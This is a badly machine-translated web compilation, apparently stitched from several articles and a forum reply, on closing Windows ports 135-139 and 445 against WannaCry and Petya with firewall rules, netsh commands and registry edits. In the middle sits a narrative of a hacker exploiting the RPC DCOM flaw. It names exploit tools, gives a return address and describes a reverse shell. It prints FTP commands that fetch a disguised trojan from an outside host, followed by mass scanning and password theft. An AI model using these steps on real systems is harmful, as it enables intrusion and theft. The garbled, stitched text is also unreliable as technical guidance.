Yesterday, unknown people staged another massive attack using a ransomware virus. Experts said that dozens of large companies in Ukraine and Russia were affected. The ransomware is called Petya.A (probably, the virus is named after Petro Poroshenko). They write that if you create a perfc file (without extension) and place it at C:\Windows\, the virus will bypass you. If your computer went into a reboot and started "checking the disk", you need to turn it off immediately. Booting from a LiveCD or USB will give you access to the files. Another way to protect yourself is to close ports 1024-1035, 135 and 445. We will now understand how to do this using the example of Windows 10.

Step 1
Go to Windows Firewall(it is better to choose the enhanced security mode), select the tab " Extra options».
Select the tab " Rules for incoming connections", then action " Create Rule” (in the right column).

Step 2
Select the type of rule - " for Port". In the next window select " TCP protocol”, specify the ports that you want to close. In our case, this 135, 445, 1024-1035 " (without quotes).

Step 3
Select the item " Block connection”, in the next window we mark all profiles: Domain, Private, Public.

Step 4
It remains to come up with a name for the rule (so that it will be easy to find in the future). You can specify a description for the rule.

If some programs stop working or start to work incorrectly, you may have closed the port they are using. You will need to add an exception in the firewall for them.

135 TCP port used by remote services (DHCP, DNS, WINS, etc.) and in Microsoft client-server applications (eg Exchange).

445 TCP port used in Microsoft Windows 2000 and later for direct TCP/IP access without using NetBIOS (for example, in Active Directory).

Publication

The WannaCry virus, also known as WannaCrypt or Wanna Decryptor, hit the virtual world in May 2017. Malware penetrated local networks, infecting one computer after another, encrypted files on disks and demanded that the user transfer $300 to $600 to extortionists to unlock them. The Petya virus, which gained almost political notoriety in the summer of 2017, acted in a similar way.

Both network pests penetrated the operating system of the victim computer through the same door - network ports 445 or 139. Following two large viruses, smaller types of computer infection began to exploit. What are these ports that are scanned by everyone who is not lazy?

What are ports 445 and 139 responsible for in Windows

These ports are used for Windows system to share files and printers. The first port is responsible for the Server Message Blocks (SMB) protocol, and the Network Basic Input-Output System (NetBIOS) protocol works through the second. Both protocols allow computers under Windows control connect over the network to "shared" folders and printers over the main TCP and UDP protocols.

Starting with Windows 2000, file and printer sharing over a network is done primarily through port 445 using the SMB application protocol. The NetBIOS protocol was used in earlier versions of the system, working through ports 137, 138 and 139, and this feature has been preserved in more later versions systems as an atavism.

Why open ports are dangerous

445 and 139 is a subtle but significant vulnerability in Windows. Leaving these ports unsecured opens the door wide to your HDD for uninvited guests like viruses, trojans, worms, as well as for hacker attacks. And if your computer is on local network, then all its users are at risk of being infected with malware.

In effect, you are sharing your hard drive with anyone who can access these ports. If desired and skill, attackers can view the content hard drive, or even delete data, format the disk itself, or encrypt files. That's exactly what they did WannaCry viruses and Petya, whose epidemic swept the world this summer.

Thus, if you care about the security of your data, it will not be out of place to learn how to close ports 139 and 445 in Windows.

Finding out if ports are open

In most cases, port 445 is open in Windows because printer and file sharing features are automatically enabled even when Windows installation. This can be easily checked on your machine. Press keyboard shortcut Win+R to open the window quick start. In it enter “ cmd" to run the command line. At the command line, type " netstat-na" and press Enter. This command allows you to scan all active network ports and display data about their status and current incoming connections.

After a few seconds, the port statistics table will appear. At the very top of the table, the IP address of port 445 will be indicated. If the status in the last column of the table is “LISTENING”, it means that the port is open. Similarly, you can find port 139 in the table and find out its status.

How to close ports in Windows 10/8/7

There are three main methods to close port 445 in Windows 10, 7 or 8. They do not differ much from each other depending on the version of the system and are quite simple. You can try any of them to choose from. You can also close port 139 in the same way.

Close ports through firewall

The first method, which allows you to close port 445 in Windows, is the simplest and is available to almost any user.

1. Go to Start > Control Panel > Windows Firewall and click on the link Extra options.
2. Click Inbound Exception Rules > New Rule. In the window that appears, select For Port > Next > TCP Protocol > Defined Local Ports, in the field next to enter 445 and click Further.
3. Next select Block connection and press again Further. Check three checkboxes again Further. Specify a name and optionally a description for the new rule and click Ready.

Now the possibility of incoming connection to port 445 will be closed. If necessary, a similar rule can be created for port 139.

Closing ports via command line

The second method involves command line operations and is more suitable for advanced Windows users.

1. Click Start and in the search bar at the bottom of the menu, type “ cmd". In the list that appears, click right click mouse on cmd and choose Run as administrator.
2. Copy the command into the command line window netsh advfirewall set allprofile state on. Click Enter.
3. Then copy the following command: netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_TCP-445". Click Enter again.

This procedure will also create a Windows Firewall rule to close port 445. Some users, however, report that this method does not work on their machines: when checked, the port remains in the “LISTENING” status. In this case, you should try the third method, which is also quite simple.

Closing ports through the Windows registry

You can also block connections to port 445 by changing the system registry. Use this method with caution: Windows registry is the main database of the entire system, and an accidental mistake can lead to unpredictable consequences. Before working with the registry, it is recommended to do backup, for example, using the CCleaner program.

1. Click Start and in the search bar type “regedit”. Click Enter.
2. In the registry tree, change to the following directory: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters.
3. A list of options will be displayed on the right side of the window. Right-click in an empty area of ​​the list and select Create. From the drop-down menu, select DWORD value (32-bit) or DWORD value (64-bit) depending on your system type (32-bit or 64-bit).
4. Rename new parameter in SMBDeviceEnabled, and then double-click on it. In the displayed window Changing a parameter in field Meaning replace 1 with 0 and click OK for confirmation.

This method is most effective if you follow the instructions above exactly. Note that it only applies to port 445.

In order for protection to be more effective, after making changes to the registry, you can also disable Windows service server. To do this, do the following:

1. Click Start and in the search bar type "services.msc". A list of Windows system services will open.
2. Find the Server service and double click on it. As a rule, it is located somewhere in the middle of the list.
3. In the window that appears, in the drop-down list Launch type select Disabled and press OK.

The above methods (with the exception of the third one) allow you to close not only port 445, but also ports 135, 137, 138, 139. To do this, when performing the procedure, simply replace the port number with the one you need.

If you later need to open ports, simply delete the created rule in Windows firewall or change the value of the parameter created in the registry from 0 to 1, and then enable the service back Windows Server by selecting from the list Launch type meaning Automatically instead of Disabled.

Important! It must be remembered that port 445 in Windows is responsible for sharing files, folders, and printers. Thus, if you close given port, you can no longer "share" shared folder for other users, or print the document over the network.

If your computer is connected to a local network and you need these functions to work, you should use third-party security tools. For example, activate firewall your antivirus, which will take control of all ports and will monitor them for unauthorized access.

By following the recommendations above, you can protect yourself from a subtle but serious vulnerability in Windows and protect your data from numerous types of malware that can enter the system through ports 139 and 445.

The vulnerability was terrifying, really
ready-made exploit turned out to be unavailable for
the bulk of the people ... That's probably why
nobody felt afraid...

A group of Polish experts in the field
security computer technology"Last
Stage of Delirium "told the public about the found
them vulnerabilities, handling DCOM objects in
context of the RPC protocol. It was something
amazing because this protocol
used by almost everyone
currently existing versions of Windows.
Vulnerable turned out to be Windows NT, Windows XP, Windows 2000
and even Windows Server 2003 was targeted. This
was more than enough to take over
most users' computers
Internet networks. Moreover, many servers are not
blocked incoming packets on port 135,
it was he who was used for the attack. What
made them potential victims.

But a few hours later, Todd Sabin reports,
that all RPC services are vulnerable. it
means that setting the firewall to
blocking port 135 is not enough
means of protection. Dangers exposed
computers with open 135 (UDP/TCP), 139, 445 and 593
ports. media coverage given error, how
potential security risk
Windows users. The matter went to the global
disaster. But since the public
no exploit was released, everyone continued
live your old life without thinking about
consequences of its appearance in the masses.

But not everyone reacted so passively to
the occurrence of this vulnerability. hackers
gradually began to write private
exploits, and script kids kept waiting for it
appearance. The result did not take long
wait. Within a few days they appear
some developments in this area,
the first exploits appear. Nonetheless
most of them just provoke a crash
on the remote system. What can be explained
since the technical details about
the found vulnerability was not known. Although
some OS versions already successfully
were exploited.

This day was a turning point in history.
exploiting this vulnerability. Finally
appears technical description Problems.
After which a large number are born
exploits for different versions of Windows.
Some of them even have a graphic
interface, and sometimes the scanning function
a specific range of IP addresses.

It was at this moment that a massive
attack by hackers on ordinary users.
Moreover, the Internet worm MS Blast appeared,
which easily penetrated computers
connected to the Internet and even
corporate networks of the largest companies
peace. Everyone is in danger...

Attacking a remote machine does not amount to
special labor. So the script kids took over
your business. Theft of credit cards and private
exploits has increased several times. And
many tasty segments of the network have become
taste it. That's what he did
one hacker. He wanted to take over the server for a long time,
but a decent vulnerability under it before that
did not have. Don't take advantage of this
he simply could not be a gift of fate.

A play in three acts

The first thing he had to do before
attack, it is to check which one
operating system installed on
server. For this he used
nmap utility. The hacker has repeatedly written about her
possibilities, but I will repeat myself and say that
it is used to determine the OS version
on the remote computer. Good thing she
exists for both Windows and *nix. BUT
as a hacker for his work
used Windows, then his choice fell on
graphical version of nmap.

A few minutes of scanner operation and
the result is positive. 135 port turned out to be
open and not protected by a firewall. it
was the beginning of the end, the beginning of the long-awaited
attacks. At this point, it has already been written
many exploits, including "RCP Exploit GUI #2".
His distinguishing feature was that he
had a graphical interface and contained in
own built-in scanning functions
IP range, as well as an FTP server.

Running the exploit, he indicated the address
target computer. But in the OS list for
attacked Windows machines NT was not specified. But
it was installed on the server. it
serious problem because
to run an exploit you need to know it
the exact address in memory, to then transfer
control on him. A little digging into
files downloaded with the exploit, it
found a small list of addresses under the broad
variety Windows line. Among them
was present and Windows NT preinstalled
Service Pack 4. It was his meaning that he indicated in
as the return address by spitting on the manual
OS selection. The number 0xE527F377 became his secret
a pass to the life of the server. And he started attacking.

The system gave up without any
incidents, so the hacker got a reverse-shell
With remote server. Now that he could
perform anything on it, it's come
time to install Trojan. Among the big
number of possible, DonaldDick was chosen. For
he had to carry out his plan
get hosting free server With
FTP support. BY.RU fit perfectly, exactly
there he uploaded the server for the Trojan. Now,
when DonaldDick became available via FTP, he
took up the victim, or rather began to upload
Trojan server on it. It was good
a well-thought-out plan, because the vulnerability
could have been patched, and the Trojan is also in Africa
trojan. By typing in the ftp console, he began
upload file. The whole process took him
writing just five lines:

open by.ru
server_name.by.ru
password
get fooware.exe
bye

Where fooware.exe is the renamed server for
Donald Dick. When the file has downloaded, it has
just run it. For this he simply
wrote the file name (fooware.exe) and enjoyed
pressed Enter ... After which the hacker received a convenient
control over the server.

But you know how it always is when
find something interesting continue with
play it. So our Hacker wanted
get more than one system. After looking
that the exploit allows a massive
scanning, he set to work, or rather
KaHt took over the job. Its use
turned out not to be difficult. So for example, to
about scanning the network with IP 192.168.0.* (class C), it
you had to type "KaHt.exe 129.168.0.1
192.168.0.254". Which actually he did,
then periodically check
results. Thus he gained access
to even more users, from
which he then managed to obtain passwords for
different services, mail, and much more
useful information. Not to mention,
that he began to use many of them as
anonymous proxies.

Food for thought

Although Microsoft released a patch a long time ago,
users and admins are in no hurry
install patches, hoping that their network does not
no one will be interested. But such hackers
a large number and installation of the patch is
more of a necessity than a possibility.
You can also block all incoming packets
on 135, 139, 445 and 593 ports.

Naturally, the hacker did all this through
anonymous proxy, and as a result cleaned
behind a trace of presence in the system. But you
should think before repeating
his exploits. After all, such actions are considered
illegal and may result in
you are deplorable enough...

Blood, the fact that your firewall shows that svchost.exe is listening to this port does not mean that it is open for connection from the outside.

The rules seem to be written and should work.

Have you tried port scanners? - TsOB (Center for Security Provision) (clause 2.7)

And do not forget that IPv6 will still need to be checked, because. it is enabled in your system, but scanners usually check only IPv4 (I'm talking about centralized services).

If you do not need this protocol at all, then you can disable it:

To disable IP version 6 components in Windows Vista, follow the steps below.

1. Click the Start button, type regedit in the Start Search box, then select regedit.exe from the Programs list.

2. In the User Account Control dialog box, click Continue.

3. Locate and select the following registry subkey:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\

4. Double-click DisabledComponents to change the DisabledComponents setting.

Note. If the DisabledComponents parameter is not available, it must be created. To do this, follow the steps below.

1. On the Edit menu, select New, and then DWORD (32-bit) Value.

2. Type DisabledComponents and press ENTER.

3. Double-click DisabledComponents.

5. Enter any of the following values ​​to configure IP version 6, and then click OK.

1. Enter 0 to enable all IP version 6 components.

Note. The value "0" is used by default.

2. Enter 0xffffffff to disable all IP version 6 components except the loopback interface. With this value, Windows Vista will also use IP version 4 in prefix policies instead of IPv6.

3. Enter 0x20 to use the IP version 4 prefix in policies instead of IP version 6.

4. Enter 0x10 to disable IP version 6 native interfaces.

5. Enter 0x01 to disable all IP version 6 tunnel interfaces.

6. Enter 0x11 to disable all IP version 6 interfaces except the loopback interface.

Notes

* Using values ​​other than 0x0 or 0x20 may cause the Routing and Remote Access service to fail.

* You must restart your computer for the changes to take effect.

The information in this article applies to the following products.

*Windows Vista Enterprise

*Windows Vista Enterprise 64-bit edition

*Windows Vista Home Basic 64-bit edition

*Windows Vista Home Premium 64-bit edition

*Windows Vista Ultimate 64-bit edition

*Windows Vista Business

*Windows Vista Business 64-bit edition

*Windows Vista Home Basic

*Windows Vista Home Premium

*Windows Vista Starter

*Windows Vista Ultimate

*Windows 7 Enterprise

*Windows 7 Home Basic

*Windows 7 Home Premium

*Windows 7 Professional

*Windows 7 Ultimate

*Windows Server 2008 R2 Data Center

* Windows Server 2008 R2 Enterprise

*Windows Server 2008 R2 Standard

*Windows Server 2008 Data Center

*Windows Server 2008 Enterprise

*Windows Server 2008 Standard

Source - http://support.microsoft.com/kb/929852

After disconnecting and rebooting, you have from the list received by the command ipconfig /all a bunch of extra lines will disappear and only the interfaces you know well will remain.

The reverse inclusion is performed by simply deleting the created key from the registry or replacing the value with "0" and then rebooting.

Every day, PC owners are faced with huge amount dangerous programs and viruses that one way or another get on the hard drive and cause leakage of important data, computer breakdown, theft important information and other unpleasant situations.

Most often, computers running on Windows of any version, be it 7, 8, 10 or any other, are infected. main reason such statistics are incoming connections to the PC or "ports", which are the weak point of any system due to their availability by default.

The word "port" is a term meaning serial number incoming connections that are directed to your PC from external software. It often happens that these ports use viruses that easily penetrate your computer using an IP network.

Viral software, once it enters the computer through such incoming connections, it quickly infects all important files, not only user files, but also system ones. To avoid this, we recommend that you close all standard ports, which can become your vulnerable spot when attacked by hackers.

Which ports are the most vulnerable in Windows 7-10?

Numerous studies and surveys of experts show that up to 80% of malicious attacks and hacks occurred using the four main ports used to quickly exchange files between different versions Windows:

• TCP port 139 required for remote connection and PC control;
• TCP port 135, intended for executing commands;
• TCP port 445 for fast file transfer;
• UDP port 137, through which a quick search on the PC is carried out.

Close ports 135-139 and 445 in Windows

We invite you to familiarize yourself with the most simple ways Closing Windows ports that do not require additional knowledge and professional skills.

Using the command line

Command Windows string- this is a software shell that is used to set certain functions and parameters for software that does not have its own graphical shell.

In order to run command line, necessary:

1. Simultaneously press the key combination Win + R
2. In the command line that appears, enter cmd
3. Click on the "OK" button

will appear working window with a black background, in which it is necessary to enter the following commands one by one. After each line entered, press the Enter key to confirm the action.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name="Block1_TCP-135"(command to close port 135)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name="Block1_TCP-137"(command to close port 137)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name="Block1_TCP-138"(command to close port 138)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name="Block_TCP-139"(command to close port 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name="Block_TCP-445"(command to close port 445)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name="Block_TCP-5000"

The six commands we have given are needed to: close 4 vulnerable Windows TCP ports (open by default), close UDP port 138, and close port 5000, which is responsible for displaying a list of available services.

We close ports with third-party programs

If you do not want to spend time working with the command line, we suggest that you familiarize yourself with third party applications. The essence of such software is to edit the registry in automatic mode With GUI, without the need for manual entry of commands.

According to our users, the most popular program for these purposes is Windows Doors Cleaner. It will help you to easily close ports on a computer running Windows 7/8/8.1/10. Older Versions operating systems unfortunately not supported.

How to work with a program that closes ports

In order to use Windows Doors Cleaner, you must:

1. Download software and install it
2. Run the program by right-clicking on the shortcut and selecting "run as administrator"
3. In the working window that appears, there will be a list of ports and the “Close” or “Disable” buttons that close vulnerable Windows ports, as well as any others you wish
4. After the necessary changes have been made, you must reboot the system

Another advantage of the program is the fact that with its help you can not only close ports, but also open them.

Drawing conclusions

Closing vulnerable network ports in Windows is not a panacea for all ills. It is important to remember that network security can only be achieved through comprehensive actions aimed at closing all the vulnerabilities of your PC.

For safety Windows user it is mandatory to install critical updates from Microsoft, have licensed anti-virus software and an enabled firewall, use only safe software and regularly read our articles in which we talk about all existing ways achieve anonymity and security of your data.

Do you know better ways to close network ports? Share your knowledge in the comments and do not forget to repost the article to your page. Share useful information with your friends and don't give hackers a chance to harm your loved ones!